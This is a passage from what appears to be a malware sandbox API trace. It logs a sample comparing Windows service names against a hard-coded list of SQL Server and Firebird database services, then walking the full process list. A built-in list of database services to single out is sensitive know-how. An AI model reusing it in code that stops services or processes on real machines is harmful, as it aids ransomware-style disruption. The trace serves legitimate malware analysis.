lpString2="ShellHWDetection") returned 1 [0071.469] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0071.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0071.469] lstrlenW (lpString="Spooler") returned 7 [0071.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0071.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0071.469] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0071.469] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0071.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0071.469] lstrlenW (lpString="SSDPSRV") returned 7 [0071.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0071.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0071.470] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0071.470] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0071.470] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0071.470] lstrlenW (lpString="StateRepository") returned 15 [0071.470] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0071.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0071.470] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0071.470] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0071.470] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0071.470] lstrlenW (lpString="SysMain") returned 7 [0071.470] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0071.470] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0071.470] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0071.470] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0071.470] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3cd2e68 | out: hHeap=0x5d0000) returned 1 [0071.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x394 [0071.474] Process32FirstW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.474] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0071.475] lstrlenW (lpString="System") returned 6 [0071.475] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0071.476] lstrlenW (lpString="smss.exe") returned 8 [0071.476] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.477] lstrlenW (lpString="csrss.exe") returned 9 [0071.477] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0071.478] lstrlenW (lpString="wininit.exe") returned 11 [0071.478] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.479] lstrlenW (lpString="csrss.exe") returned 9 [0071.479] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0071.480] lstrlenW (lpString="winlogon.exe") returned 12 [0071.480] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0071.480] lstrlenW (lpString="services.exe") returned 12 [0071.481] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0071.481] lstrlenW (lpString="lsass.exe") returned 9 [0071.481] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.534] lstrlenW (lpString="svchost.exe") returned 11 [0071.534] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0071.535] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0071.535] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0071.536] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0071.536] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.536] lstrlenW (lpString="svchost.exe") returned 11 [0071.537] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0071.537] lstrlenW (lpString="dwm.exe") returned 7 [0071.537] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.538] lstrlenW (lpString="svchost.exe") returned 11 [0071.538] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.539] lstrlenW (lpString="svchost.exe") returned 11 [0071.539] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.540] lstrlenW (lpString="svchost.exe") returned 11 [0071.540] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.541] lstrlenW (lpString="svchost.exe") returned 11 [0071.541] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.542] lstrlenW (lpString="svchost.exe") returned 11 [0071.542] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.543] lstrlenW (lpString="svchost.exe") returned 11 [0071.543] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.544] lstrlenW (lpString="svchost.exe") returned 11 [0071.544] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.545] lstrlenW (lpString="svchost.exe") returned 11 [0071.545] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.546] lstrlenW (lpString="svchost.exe") returned 11 [0071.546] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0071.547] lstrlenW (lpString="spoolsv.exe") returned 11 [0071.547] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.547] lstrlenW (lpString="svchost.exe") returned 11 [0071.548] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.548] lstrlenW (lpString="svchost.exe") returned 11 [0071.548] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0071.549] lstrlenW (lpString="audiodg.exe") returned 11 [0071.549] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0071.550] lstrlenW (lpString="sihost.exe") returned 10 [0071.550] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.551] lstrlenW (lpString="svchost.exe") returned 11 [0071.551] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0071.551] lstrlenW (lpString="taskhostw.exe") returned 13 [0071.552] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0071.552] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0071.552] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0071.553] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0071.553] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0071.554] lstrlenW (lpString="explorer.exe") returned 12 [0071.554] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0071.555] lstrlenW (lpString="Memory Compression") returned 18 [0071.555] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0071.556] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0071.556] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0071.557] lstrlenW (lpString="SearchUI.exe") returned 12 [0071.557] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0071.557] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0071.557] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0071.558] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0071.558] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0071.559] lstrlenW (lpString="taskhostw.exe") returned 13 [0071.559] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0071.560] lstrlenW (lpString="UsoClient.exe") returned 13 [0071.560] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0071.561] lstrlenW (lpString="taskhostw.exe") returned 13 [0071.561] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0071.562] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0071.562] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0071.563] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0071.563] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0071.563] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0071.563] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0071.564] lstrlenW (lpString="screensaver.exe") returned 15 [0071.564] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0071.565] lstrlenW (lpString="xml upper.exe") returned 13 [0071.565] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0071.565] lstrlenW (lpString="defeat preston.exe") returned 18 [0071.566] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0071.566] lstrlenW (lpString="boss isolated.exe") returned 17 [0071.566] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0071.567] lstrlenW (lpString="member.exe") returned 10 [0071.567] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0071.568] lstrlenW (lpString="chubby-er.exe") returned 13 [0071.568] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0071.568] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0071.569] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0071.569] lstrlenW (lpString="organization.exe") returned 16 [0071.569] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0071.570] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0071.570] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0071.571] lstrlenW (lpString="spray-roman.exe") returned 15 [0071.571] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0071.571] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0071.571] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0071.572] lstrlenW (lpString="tank attacks.exe") returned 16 [0071.572] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0071.573] lstrlenW (lpString="wires jacket.exe") returned 16 [0071.573] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0071.574] lstrlenW (lpString="values.exe") returned 10 [0071.574] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0071.575] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0071.575] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0071.598] lstrlenW (lpString="printersaerospace.exe") returned 21 [0071.598] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0071.599] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0071.599] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0071.600] lstrlenW (lpString="dllhost.exe") returned 11 [0071.600] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0071.601] lstrlenW (lpString="joke.exe") returned 8 [0071.601] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0071.602] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0071.602] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0071.603] lstrlenW (lpString="documents.exe") returned 13 [0071.603] Process32NextW (in: hSnapshot=0x394, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 